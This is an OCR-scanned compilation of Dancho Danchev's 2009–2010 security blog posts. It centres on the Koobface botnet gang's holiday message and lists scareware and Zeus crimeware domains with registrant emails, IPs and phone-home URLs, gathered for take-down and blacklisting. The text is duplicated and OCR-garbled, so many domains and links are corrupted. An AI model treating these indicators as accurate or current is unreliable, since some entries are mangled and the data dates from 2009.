[18]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[19]Koobface Botnet’s Scareware Business Model - Part Two 
[20]Koobface Botnet’s Scareware Business Model - Part One 
[21]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[22]New Koobface campaign spoofs Adobe’s Flash updater 
[23]Social engineering tactics of the Koobface botnet 
[24]Koobface Botnet Dissected in a TrendMicro Report 
[25]Movement on the Koobface Front - Part Two 
[26]Movement on the Koobface Front 

[27]Koobface - Come Out, Come Out, Wherever You Are 


[28]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [29]Dancho Danchev’s blog. 


. http://twitter.com/danchodanchev/status/6549021186 


ttp://www.ris.ripe.net/cgi-bin/lg/index.cgi?rrc=RRCOO1k&query=1karg=91.212.107.0%2F24 
-ri ltd.htm 
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10. http: //ddanchev. blogspot .com/2009/08/dissect ing-ongoing-us-federal-forms.htm 
11. http://ddanchev. blogspot .com/2009/09/koobface-botnets-scareware-business.htm 
12. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 
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14. http://ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro. html 
15. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business. htm 


16. http://us.trendmicro.com/imperia/md/content/us/trendwat ch/researchandanalysis/the_20heart_200f_20koobface 
final_1_.pdf 
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. blogspot . com/2009/10/koobface-botnet-redirects-facebooks-ip. html 
net .com/security/?p=4594 

zdnet . com/2346-12691_22-352597 .htm1 

. blogspot . com/2009/10/koobface-botnet-dissected-in-trendmicro.html 
- blogspot . com/2009/08/movement-on-koobface-front-part-two. html 

- blogspot . com/2009/08/movement-on-koobface-front .html 

- blogspot . com/2009/07/koobface-come-out- come-out-wherever-you. html 
. blogspot . com/2009/07/dissecting-koobface-worms-twitter. html 

. blogspot. com/ 


5.12.8 The Koobface Gang Wishes the Industry "Happy Holidays" (2009-12-26 23:25) 


WP loabiaes 


We wish you 
@ 2 Merry Christmas - 
Sof wl ‘and a Happy New 
a> 2010 Year! 
. : e e 
) wad, 


a ie 


© 2008-2010 ali baba & 4 
Thank you! There are 8514 congratulations that we have. 


Oops, they did it again - the Koobface gang, which is now officially self-describing itself as Ali 
Baba and the 40 Thieves LLC, has not only included a Koobface-themed - notice the worm in 
the name - background on Koobface-infected hosts, but it has also included a "Wish Koobface 
Happy Holidays" script - last time | checked there were 10,000 people who clicked it - followed 
by the most extensive message ever left by the gang, which is amusingly attempting to 
legitimize the activities of the gang. 
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Our team, so often called “Koobface Gang”. expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

® Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of 
course analyzing software under VM Ware; 

® Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes ve've ever made; 

®@ Cisco for their 3rd place to our software in their annual “working groups awards"; 

® Soren Siebert with his great article; 

@ Hundreds of users who send us logs, crash reports, and wish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us 
move ahead, And we've moved, And will move. Improving their security system, 


By the way, we did not have s cent using Twitter's traffic, But many security issues tell the world we did. They are wrong. 

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not ever steal credit card or oatine bank information, passwords or any other confidential data. And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it :) 

Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 


In short, the message with clear elements of PSYOPS, attempts to position the Koobface worm 
as a software, where the new features are requested by users, and that by continuing its 
development, the authors are actually improving Facebook’s security systems. For the record, 
the Koobface botnet itself is only the tip of the iceberg for the malicious activities the group 
itself is involved in. Consider going through the related Koobface research posts featured at 
the bottom of the post, in order to grasp the importance of how widespread and high-profile 
the activities of this group are. The exact message, screenshot of which is attached reads: 


Our team, so often called "Koobface Gang", expresses high gratitude for the help in bug 
fixing, researches and documentation for our software to: 


¢ Kaspersky Lab for the name of Koobface and [1]25 millionth malicious program award; 


¢ Dancho Danchev (http://ddanchev.blogspot.com) who worked hard every day especially 
on our First Software & Architecture version, writing lots of e-mails to different hosting 
companies and structures to take down our Command-and-Control (C &C) servers, and of 
course analyzing software under VM Ware; 


¢ Trend Micro (http://trendmicro.com), especially personal thanks to Jonell Baltazar, 
Joey Costoya, and Ryan Flores who had released [2]a very cool document (with three 
parts!) describing all our mistakes we’ve ever made; 


* Cisco for their 3rd place to our software in their annual [3]"working groups awards"; 
¢ Soren Siebert with [4]his great article; 


¢ Hundreds of users who send us logs, crash reports, and wish-lists. 
In fact, it was a really hard year. We’ve made many efforts to improve our software. Thanks 


to Facebook’s security team - the guys made us move ahead. And we’ve moved. And will 
move. Improving their security system. 
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By the way, we did not have a cent using Twitter’s traffic. But many security issues tell 
the world we did. They are wrong. As many people know, "virus" is something awful, which 
crashes computers, steals credential information as good as all passwords and credit cards. 
Our software did not ever steal credit card or online bank information, passwords or any other 
confidential data. And WILL NOT EVER. As for the crashes... We are really sorry. We work on 
it :) Wish you a good luck in new year and... Merry Christmas to you! 


Always yours, "Koobface Gang". 


For the record, in case you were living on the other side of the universe, and weren’t interested 
in the raw details taking place within the underground ecosystem, in July, 2009, I was [5]the 
only individual ever mentioned by the Koobface gang, which back then included [6]the 
following message within the [7]command and control infrastructure for 9 days: 


° "We express our high gratitude to Dancho Danchev 
(http://ddanchev.blogspot.com) for the help in bug fixing, researches and 
documentation for our software." 


Next to [8]the folks at TrendMicro, the DHS also featured the event in [9]DHS Daily Open 
Source Infrastructure Report for 3 September 2009 at page 18: 


¢ "This individual is an independent security consultant who plays an active role in tracking 
and shutting down botnets and other illegal operations." 


It got ever more personal when [10]the Koobface gang redirected Facebook’s entire IP space 
to my blog in October, 2009, resulting in [11]thousands of Facebook visits every time [12]their 
crawlers were visiting a [13]Koobface-infected host. Thankfully, Facebook’s Security Incident 
Response Team quickly took care of the issue. 


In the spirit of Christmas, I’d also like to wish the Koobface gang happy holidays, and 
promise them that the cherry on the top of the research pie will see daylight anytime soon. 
First of all, I’d like to wish them happy holidays with [14]Frank Sinatra - "I’ve got you under 
my skin". They'll get the point. 

[EMBED] 


And now comes my Christmas present, systematic take-down, blacklisting, and domain 
suspension of Koobface scareware operations. 
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San Up | Quckist 


Video posted by *** SantA *** 


Video Responses: 10 Text Comments: 70 


Would you like to comment? 


Sample detection rates by Koobface binaries - [15]go.exe; [16]fb.79.exe; [17]fblanding.exe; 
[18]v2captcha.exe; [19]v2webserver.exe; [20]pack _312s3.exe (the scareware). The cur- 
rently active artificial2010 .com/?pid=312s02 &sid=4db12f - Email: Josefinat@yahoo.com - 
193.104.22.200 - [21]AS34305; EUROACCESS Global Autonomous System acts as a redirector 
to the scareware domain portfolio. 


Currently active portfolio of scareware domains pushed by the Koobface botnet, parked 
at 193.104.22.200/91.212.226.95: 

2010scanneral .com - Email: NathanHSchafer@yahoo.com 
artificial2010 .com - Email: Josefinat@yahoo.com 
bestdiscounts2010 .com - Email: FrancesHAustin@yahoo.com 
bestparty2009 .com - Email: FrancesHAustin@yahoo.com 
bestparty2010 .com - Email: FrancesHAustin@yahoo.com 
bestpffers2010 .com - Email: FrancesHAustin@yahoo.com 
best-wishes-design .com - Email: FrancesHAustin@yahoo.com 
bestyearparty .com - Email: FrancesHAustin@yahoo.com 
celebrate2009year .com - Email: FrancesHAustin@yahoo.com 
celebrate-designs .com - Email: FrancesHAustin@yahoo.com 
happy-newyear2010 .com - Email: JerryHWallace@yahoo.com 
internetproscanm .com - Email: JacquelynMRyan@yahoo.com 
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internetproscanq .com - Email: JacquelynMRyan@yahoo.com 
internetproscanr .com - Email: JacquelynMRyan@yahoo.com 
internetproscanw .com - Email: JacquelynMRyan@yahoo.com 
internetproscany .com - Email: JacquelynMRyan@yahoo.com 
megascannera .com - Email: MichaelDFranklin@yahoo.com 
megasecurityl .com - Email: MichaelDFranklin@yahoo.com 
megasecurityp .com - Email: MichaelDFranklin@yahoo.com 
megasecurityq .com - Email: MichaelDFranklin@yahoo.com 
newholidaydesigns .com - Email: FrancesHAustin@yahoo.com 
newyearandsanta .com - Email: JerryHWallace@yahoo.com 
newyeardesgings .com - Email: FrancesHAustin@yahoo.com 
onlinesecurityn1 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn2 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn3 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn4 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn5 .com - Email: LucyGBrown@yahoo.com 
online-securtiyv1 .com - Email: LucyGBrown@yahoo.com 
online-securtiyv4 .com - Email: LucyGBrown@yahoo.com 
online-securtiyv5 .com - Email: LucyGBrown@yahoo.com 
onlineviruskillaO .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla2 .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla4 .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla6 .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla8 .com - Email: JacquelynMRyan@yahoo.com 
santa-christmas2010 .com - Email: JerryHWallace@yahoo.com 
snowandchristmas .com - Email: JerryHWallace@yahoo.com 
thebestantispys .com - Email: ThomasLRoy@yahoo.com 


Christmas-themed scareware serving domains: 
happy-newyear2010 .com 

celebrate2009year .com 

newyearandsanta .com 

newyeardesgings .com 

santa-christmas2010 .com 

snowandchristmas .com 
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Speaking of AS34305; EUROACCESS Global Autonomous System, they’re also hosting scare- 
ware Campaigns at another IP - 193.104.22.50 in particular: 
pcprotect2010 .com - Email: admin@pcprotect2010.com 
bestantispysoft2010 .com - Email: admin@bestantispysoft2010.com 
worldantispywarel .com - Email: admin@worldantispywarel.com 
antispyware24x7 .com - Email: admin@antispyware24x7.com 
spydetector2009 .com - Email: admin@spydetector2009.com 
myprivatesoft2009 .com - Email: admin@myprivatesoft2009.com 
itsafetyonline .com - Email: admin@itsafetyonline.com 
antispycenterprof .com - Email: admin@antispycenterprof.com 
webspydetectunlim .com - Email: admin@webspydetectunlim.com 
pcsafetyplatinum .com - Email: admin@webspydetectunlim.com 
spywaredetect24pro .com - Email: admin@spywaredetect24pro.com 
eliminater2009pro .com - Email: admin@eliminater2009pro.com 
pcsafety2009pro .com - Email: admin@pcsafety2009pro.com 
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securityztop .com - Email: admin@securityztop.com 
antisspywarescenter .com - Email: admin@antisspywarescenter.com 
viridentifycenter .com - Email: molda444vimo@safe-mail.net 
antispywarets .com - Email: admin@antispywarets.com 
winvantivirus .com - Email: admin@winvantivirus.com 
antispywaresnet .com - Email: admin@antispywaresnet.com 
securityprosoft .com - Email: admin@securityprosoft.com 
onlineantispysoft .com - Email: admin@onlineantispysoft.com 
worldsantispysoft .com - Email: admin@worldsantispysoft.com 
antispyworldwideint .com - Email: admin@antispyworldwideint.com 
ivirusidentify .com - Email: admin@ivirusidentify.com 


Within the same ASN, we can also find the following [22]Zeus crimeware serving domains, 
courtesy of the Zeus Tracker: 

print-design .cn - Email: alexsundren@gmail.com 

backup2009 .com - Email: tahli@yahoo.com - association with [23]money mule recruitment 
domain registration 

1211news .com - Email: tahli@yahoo.com 

tuttakto .com - Email: tahli@yahoo.com 

filatok .com - Email: tahli@yahoo.com 

wwwildr .com - Email: tahli@yahoo.com 

bbbboom .com - Email: tahli@yahoo.com 

fant1k .com - Email: tahli@yahoo.com 

hoooools .com - Email: tahli@yahoo.com 

ianndex .com - Email: tahli@yahoo.com 

vklom .com - Email: tahli@yahoo.com 

wwwbypost .com - Email: tahli@yahoo.com 

wwwudacha .com - Email: tahli@yahoo.com 


[24]Sampled scareware phones back to: 

ardeana-couture .com/?b=1s1 - 204.12.252.99, parked there is also windowssp3download 
.com - Email: contact@subarutechs.com 

winrescueupdate .com/download/winlogo.bmp - 89.248.162.147 


Historically, 89.248.162.147 (AS29073-ECATEL-AS, Ecatel Network) used to host the fol- 
lowing scareware domains: 

attention-scanner .com - Email: khouri@atomtech.cc 
be-secured2 .com - Email: info@scholarnyc.com 
best-scanner-f .com - Email: LouisALeavitt@yahoo.com 
get-secure2 .com - Email: info@scholarnyc.com 
installprotection2 .com - Email: info@scholarnyc.com 
online-defense7 .com - Email: contacts@manipadni.com.br 
scan-spyware2 .com - Email: info@paristours.fr 

topscan2 .com - Email: LouisALeavitt@yahoo.com 
topscan3 .com - Email: LouisALeavitt@yahoo.com 
virus-pcscan .com - Email: admin@rewards.de 

win-scan05 .com - Email: katia@salsat.eu 

win-scan07 .com - Email: katia@salsat.eu 

win-scan09 .com - Email: katia@salsat.eu 
winrescueupdate .com 
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winscannerO1 .com - Email: contacts@crunchiesb.com 
winscanner18 .com - Email: contacts@crunchiesb.com 
your-protection8 .com - Email: admin@Relocation. it 


Happy Holidays, too! 


Related Koobface research published in 2009: 
[25]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[26]Koobface Botnet Starts Serving Client-Side Exploits 

[27]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[28]Koobface Botnet’s Scareware Business Model - Part Two 
[29]Koobface Botnet’s Scareware Business Model - Part One 
[30]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[31]New Koobface campaign spoofs Adobe’s Flash updater 
[32]Social engineering tactics of the Koobface botnet 

[33]Koobface Botnet Dissected in a TrendMicro Report 
[34]Movement on the Koobface Front - Part Two 

[35]Movement on the Koobface Front 

[36]Koobface - Come Out, Come Out, Wherever You Are 
[37]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [38]Dancho Danchev’s blog. 
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33. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
24 
35. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front .htm 

36. http: //ddanchev. blogspot . com/2009/07/koobface- come-out-come-out-wherever-you.htm 
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5.12.9 The Koobface Gang Wishes the Industry "Happy Holidays" (2009-12-26 23:25) 
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We wish ou | 
@ o Merry Christmas - 
eh wl ‘and a Happy New 


an 2010 Year. 


Thank you! There sre 8514 congratulations ‘that we have. 


Oops, they did it again - the Koobface gang, which is now officially self-describing itself 
as Ali Baba and the 40 Thieves LLC, has not only included a Koobface-themed - notice the 
worm in the name - background on Koobface-infected hosts, but it has also included a "Wish 
Koobface Happy Holidays" script - last time | checked there were 10,000 people who clicked it - 
followed by the most extensive message ever left by the gang, which is amusingly attempting 
to legitimize the activities of the gang. 
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Our team, so often called “Koobface Gang”. expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

®@ Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command:and-Control (C&C) servers, and of 
course analyzing software under VM Ware; 

® Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes ve've ever made; 

® Cisco for their 3rd place to our software in their annual “working groups awards"; 

*® Soren Siebert with his great article; 

@ Hundreds of users who send us logs, crash reports, and vish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us 
move ahead, And we've moved, And will move. Improving their security systern, 


By the way, we did not have s cent using Twitter's traffic, But many security issues tell the world we did. They are wrong. 

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data. And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it :) 

Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 


In short, the message with clear elements of PSYOPS, attempts to position the Koobface 
worm as a software, where the new features are requested by users, and that by continuing its 
development, the authors are actually improving Facebook’s security systems. For the record, 
the Koobface botnet itself is only the tip of the iceberg for the malicious activities the group 
itself is involved in. Consider going through the related Koobface research posts featured at 
the bottom of the post, in order to grasp the importance of how widespread and high-profile 
the activities of this group are. The exact message, screenshot of which is attached reads: 


Our team, so often called "Koobface Gang", expresses high gratitude for the help in bug 
fixing, researches and documentation for our software to: 


¢ Kaspersky Lab for the name of Koobface and [1]25 millionth malicious program award; 


¢ Dancho Danchev (http://ddanchev.blogspot.com) who worked hard every day especially 
on our First Software & Architecture version, writing lots of e-mails to different hosting 
companies and structures to take down our Command-and-Control (C &C) servers, and of 
course analyzing software under VM Ware; 


* Trend Micro (http://trendmicro.com), especially personal thanks to Jonell Baltazar, 
Joey Costoya, and Ryan Flores who had released [2]a very cool document (with three 
parts!) describing all our mistakes we’ve ever made; 


* Cisco for their 3rd place to our software in their annual [3]"working groups awards"; 
¢ Soren Siebert with [4]his great article; 


¢ Hundreds of users who send us logs, crash reports, and wish-lists. 
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In fact, it was a really hard year. We’ve made many efforts to improve our software. Thanks 
to Facebook’s security team - the guys made us move ahead. And we’ve moved. And will 
move. Improving their security system. 


By the way, we did not have a cent using Twitter’s traffic. But many security issues tell 
the world we did. They are wrong. As many people know, "virus" is something awful, which 
crashes computers, steals credential information as good as all passwords and credit cards. 
Our software did not ever steal credit card or online bank information, passwords or any other 
confidential data. And WILL NOT EVER. As for the crashes... We are really sorry. We work on 
it :) Wish you a good luck in new year and... Merry Christmas to you! 


Always yours, "Koobface Gang". 


For the record, in case you were living on the other side of the universe, and weren't in- 
terested in the raw details taking place within the underground ecosystem, in July, 2009, | 
was [5]the only individual ever mentioned by the Koobface gang, which back then included 
[6]the following message within the [7]command and control infrastructure for 9 days: 


* "We express our high gratitude to Dancho Danchev 
(http://ddanchev.blogspot.com) for the help in bug fixing, researches and 
documentation for our software." 


Next to [8]the folks at TrendMicro, the DHS also featured the event in [9]DHS Daily Open 
Source Infrastructure Report for 3 September 2009 at page 18: 


¢ "This individual is an independent security consultant who plays an active role in tracking 
and shutting down botnets and other illegal operations." 


It got ever more personal when [10]the Koobface gang redirected Facebook’s entire IP space 
to my blog in October, 2009, resulting in [11]thousands of Facebook visits every time [12]their 
crawlers were visiting a [13]Koobface-infected host. Thankfully, Facebook’s Security Incident 
Response Team quickly took care of the issue. 


In the spirit of Christmas, I’d also like to wish the Koobface gang happy holidays, and 
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promise them that the cherry on the top of the research pie will see daylight anytime soon. 
First of all, I’d like to wish them happy holidays with [14]Frank Sinatra - "I’ve got you under 
my skin". They'll get the point. 


And now comes my Christmas present, systematic take-down, blacklisting, and domain 
suspension of Koobface scareware operations. 


San Up | Quickies (0) | Helo | Loan 


Video posted by *** SantA *** 


Video Responses: 10 Text Comments: 70 


babachat (4 


Would you like to comment? 


Sample detection rates by Koobface binaries - [15]go.exe; [16]fb.79.exe; [17]fblanding.exe; 
[18]v2captcha.exe; [19]v2webserver.exe; [20]pack _312s3.exe (the scareware). The cur- 
rently active artificial2010 .com/?pid=312s02 &sid=4db12f - Email: Josefinat@yahoo.com - 
193.104.22.200 - [21]AS34305; EUROACCESS Global Autonomous System acts as a redirector 
to the scareware domain portfolio. 
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Currently active portfolio of scareware domains pushed by the Koobface botnet, parked 
at 193.104.22.200/91.212.226.95: 


2010scanneral .com - Email: NathanHSchafer@yahoo.com 
artificial2010 .com - Email: Josefinat@yahoo.com 
bestdiscounts2010 .com - Email: FrancesHAustin@yahoo.com 
bestparty2009 .com - Email: FrancesHAustin@yahoo.com 
bestparty2010 .com - Email: FrancesHAustin@yahoo.com 
bestpffers2010 .com - Email: FrancesHAustin@yahoo.com 
best-wishes-design .com - Email: FrancesHAustin@yahoo.com 
bestyearparty .com - Email: FrancesHAustin@yahoo.com 
celebrate2009year .com - Email: FrancesHAustin@yahoo.com 
celebrate-designs .com - Email: FrancesHAustin@yahoo.com 
happy-newyear2010 .com - Email: JerryHWallace@yahoo.com 
internetproscanm .com - Email: JacquelynMRyan@yahoo.com 
internetproscanq .com - Email: JacquelynMRyan@yahoo.com 
internetproscanr .com - Email: JacquelynMRyan@yahoo.com 
internetproscanw .com - Email: JacquelynMRyan@yahoo.com 
internetproscany .com - Email: JacquelynMRyan@yahoo.com 
megascannera .com - Email: MichaelDFranklin@yahoo.com 
megasecurityl .com - Email: MichaelDFranklin@yahoo.com 
megasecurityp .com - Email: MichaelDFranklin@yahoo.com 
megasecurityq .com - Email: MichaelDFranklin@yahoo.com 
newholidaydesigns .com - Email: FrancesHAustin@yahoo.com 
newyearandsanta .com - Email: JerryHWallace@yahoo.com 


newyeardesgings .com - Email: FrancesHAustin@yahoo.com 
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onlinesecurityn1 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn2 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn3 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn4 .com - Email: LucyGBrown@yahoo.com 
onlinesecurityn5 .com - Email: LucyGBrown@yahoo.com 
online-securtiyv1 .com - Email: LucyGBrown@yahoo.com 
online-securtiyv4 .com - Email: LucyGBrown@yahoo.com 
online-securtiyv5 .com - Email: LucyGBrown@yahoo.com 
onlineviruskillaO .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla2 .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla4 .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla6 .com - Email: JacquelynMRyan@yahoo.com 
onlineviruskilla8 .com - Email: JacquelynMRyan@yahoo.com 
santa-christmas2010 .com - Email: JerryHWallace@yahoo.com 
snowandchristmas .com - Email: JerryHWallace@yahoo.com 


thebestantispys .com - Email: ThomasLRoy@yahoo.com 


Christmas-themed scareware serving domains: 
happy-newyear2010 .com 

celebrate2009year .com 

newyearandsanta .com 

newyeardesgings .com 

santa-christmas2010 .com 


snowandchristmas .com 
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Speaking of AS34305; EUROACCESS Global Autonomous System, they’re also hosting scare- 
ware campaigns at another IP - 193.104.22.50 in particular: 


pcprotect2010 .com - Email: admin@pcprotect2010.com 
bestantispysoft2010 .com - Email: admin@bestantispysoft2010.com 
worldantispywarel .com - Email: admin@worldantispywarel.com 
antispyware24x7 .com - Email: admin@antispyware24x7.com 
spydetector2009 .com - Email: admin@spydetector2009.com 


myprivatesoft2009 .com - Email: admin@myprivatesoft2009.com 
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itsafetyonline .com - Email: admin@itsafetyonline.com 
antispycenterprof .com - Email: admin@antispycenterprof.com 
webspydetectunlim .com - Email: admin@webspydetectunlim.com 
pcsafetyplatinum .com - Email: admin@webspydetectunlim.com 
spywaredetect24pro .com - Email: admin@spywaredetect24pro.com 
eliminater2009pro .com - Email: admin@eliminater2009pro.com 
pcsafety2009pro .com - Email: admin@pcsafety2009pro.com 
securityztop .com - Email: admin@securityztop.com 
antisspywarescenter .com - Email: admin@antisspywarescenter.com 
viridentifycenter .com - Email: molda444vimo@safe-mail.net 
antispywarets .com - Email: admin@antispywarets.com 
winvantivirus .com - Email: admin@winvantivirus.com 
antispywaresnet .com - Email: admin@antispywaresnet.com 
securityprosoft .com - Email: admin@securityprosoft.com 
onlineantispysoft .com - Email: admin@onlineantispysoft.com 
worldsantispysoft .com - Email: admin@worldsantispysoft.com 
antispyworldwideint .com - Email: admin@antispyworldwideint.com 


ivirusidentify .com - Email: admin@ivirusidentify.com 


Within the same ASN, we can also find the following [22]Zeus crimeware serving domains, 
courtesy of the Zeus Tracker: 


print-design .cn - Email: alexsundren@gmail.com 


backup2009 .com - Email: tahli@yahoo.com - association with [23]money mule recruit- 
ment domain registration 


1211news .com - Email: tahli@yahoo.com 


tuttakto .com - Email: tahli@yahoo.com 
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filatok .com - Email: tahli@yahoo.com 
wwwidr .com - Email: tahli@yahoo.com 
bbbboom .com - Email: tahli@yahoo.com 
fantlk .com - Email: tahli@yahoo.com 
hoooools .com - Email: tahli@yahoo.com 
ianndex .com - Email: tahli@yahoo.com 
vklom .com - Email: tahli@yahoo.com 
wwwbypost .com - Email: tahli@yahoo.com 


wwwudacha .com - Email: tahli@yahoo.com 


[24]Sampled scareware phones back to: 


ardeana-couture .com/?b=1sl1 - 204.12.252.99, parked there is also windowssp3download 
.com - Email: contact@subarutechs.com 


winrescueupdate .com/download/winlogo.bmp - 89.248.162.147 


Historically, 89.248.162.147 (AS29073-ECATEL-AS, Ecatel Network) used to host the fol- 
lowing scareware domains: 


attention-scanner .com - Email: kKhouri@atomtech.cc 
be-secured2 .com - Email: info@scholarnyc.com 
best-scanner-f .com - Email: LouisALeavitt@yahoo.com 
get-secure2 .com - Email: info@scholarnyc.com 
installprotection2 .com - Email: info@scholarnyc.com 
online-defense7 .com - Email: contacts@manipadni.com.br 
scan-spyware2 .com - Email: info@paristours.fr 

topscan2 .com - Email: LouisALeavitt@yahoo.com 


topscan3 .com - Email: LouisALeavitt@yahoo.com 
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virus-pcscan .com - Email: admin@rewards.de 
win-scan05 .com - Email: katia@salsat.eu 

win-scan0O7 .com - Email: katia@salsat.eu 

win-scan09 .com - Email: katia@salsat.eu 
winrescueupdate .com 

winscannerO1 .com - Email: contacts@crunchiesb.com 
winscanner18 .com - Email: contacts@crunchiesb.com 


your-protection8 .com - Email: admin@Relocation.it 


Happy Holidays, too! 


Related Koobface research published in 2009: 
[25]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[26]Koobface Botnet Starts Serving Client-Side Exploits 

[27]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[28]Koobface Botnet’s Scareware Business Model - Part Two 
[29]Koobface Botnet’s Scareware Business Model - Part One 
[30]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[31]New Koobface campaign spoofs Adobe’s Flash updater 
[32]Social engineering tactics of the Koobface botnet 

[33]Koobface Botnet Dissected in a TrendMicro Report 
[34]Movement on the Koobface Front - Part Two 

[35]Movement on the Koobface Front 

[36]Koobface - Come Out, Come Out, Wherever You Are 


[37]Dissecting Koobface Worm’s Twitter Campaign 
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This post has been reproduced from [38]Dancho Danchev’s blog. 


1. http://www.kaspersky .com/news? id=20757583 


2: ttp://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/the_real_face_of_koobface_j 


3. http: //www.itworldcanada.com/news/cisco-gives-zeus-koobface-and-conficker-working-group-awards/139547 

4. hetp:/ ave abuse ca/tp7104 

5, hp://adanchev blogspot. con/2008/07 oobface-coae-out~<cone-out-oherever-you hal 

6 
7. bttp://1. bp. blogspot . com/_wICHhTiQmrA/StXzLSNWBII/AAAARAAAERY /muXddtmbSq¥ /s1600-h/trendmicro_koobface. JPG 
8. http: //ddanchev. blogspot . com/2009/10/koobface-botnet-dissected-in-trendmicro. html 


10. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 


11. http://4.bp.blogspot.com/_wICHhTiQmrA/St9uT2urS41/AAAAAAAAESO/K3tPvZxjx0s/s1600-h/facebook_koobface_refe 


12. bttp://2.bp.blogspot.com/_wICHhTiQmrA/St9pMvTG4nI / AAAAAAAAESQ/C1d1gY6304E/s1600-h/facebook_koobface_refe 
13. http://2.bp.blogspot.com/_wICHhTiQmrA/St9rXn5KChI/AAAAAAAAESY/HX_7jR15W7g/s1600-h/facebook_koobface_refe 
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25. http://ddanchev. blogspot . com/2009/12/koobface-friendly-riccom-1td-as29550. htm 
26. http: //ddanchev. blogspot . com/2009/11/koobface-botnet-starts-serving-client .htm 
27. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
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31. http://blogs.zdnet.com/security/?p=4594 
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37. http: //ddanchev. blogspot. com/2009/07/dissecting-koobface-worms-twitter .htm 


38. http://ddanchev.blogspot.com/ 


2964 


2010 


6.1 January 


6.1.1 Summarizing Zero Day’s Posts for December (2010-01-04 22:03) 
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Improve Test Coverage; Save Time, $ Better Gusmess 
AGobe has released a craxal patch to cover a paw of serous Outcomes with 
vulnerabéties affecting the Adobe Flash Media Server (FMS) Network Security Scanner Excepercmal Wed 
3.5.2 and earber versions. The update ts avaiable for al See & Control Any Dewce on the Expenerxes 
platforms and addresses tissues that allow an attacker to fun Network in Real Te! Download the 
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The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for December, 2009. 


You can also go through [2]previous summaries, as well as subscribe to my [3]personal 
RSS feed, [4]Zero Day’s main feed, or follow all of [5]ZDNet’s blogs on Twitter. 
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01. [6]Koobface botnet enters the Xmas season 

02. [7]How many people fall victim to phishing attacks? 

03. [8]Zeus crimeware using Amazon’s EC2 as command and control server 
04. [9]Report: Google’s reCAPTCHA flawed 

05. [1O]FBI: Scareware distributors stole $150M 


This post has been reproduced from [11]Dancho Danchev’s blog. 


. http: //blogs.zdnet.com/securit 


1 

2. http: //ddanchev. blogspot .com/2009/11/summarizing-zero-days-posts-for.html 
3. http://updates.zdnet.com/tags/dancho+danchev. htm1?t=0&s=0é0=1&émode=rss 

4. http: //feeds. feedburner . com/zdnet/security 

5. http: //twitter. com/zdnetblogs 
6 
7 
8 
9 


. http://blogs.zdnet .com/security/?p=500 

. http: //blogs.zdnet .com/security/?p=5084 
. http: //blogs.zdnet . com/security/?p=5110 
- http: //blogs. zdnet . com/security/7p=5123 
10. http: //blogs. zdnet . com/security/?p=5140 
11. http: //ddanchev blogspot... com/ 
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6.1.2 Top Ten Must-Read Posts at ZDNet’s Zero Day for 2009 (2010-01-04 22:10) 


ZONET 


ZDNet Search: * 


Home News & Blogs Videos White Papers Downloads Reviews Popular - 


Ryan Naraine and Dancho Danchev 
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December 21st, 2009 technology 


business, and Me, 
Adobe plugs gaping holes in Flash Media Server and matter to the 
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M Adobe Arita; ode foetcutes Bee . ats fa 1223) 


More from 18M 


ope Aca 2 a 2 Sponsored Links 
aly 7TakBaks *“S + IP Infrastructure Testing 
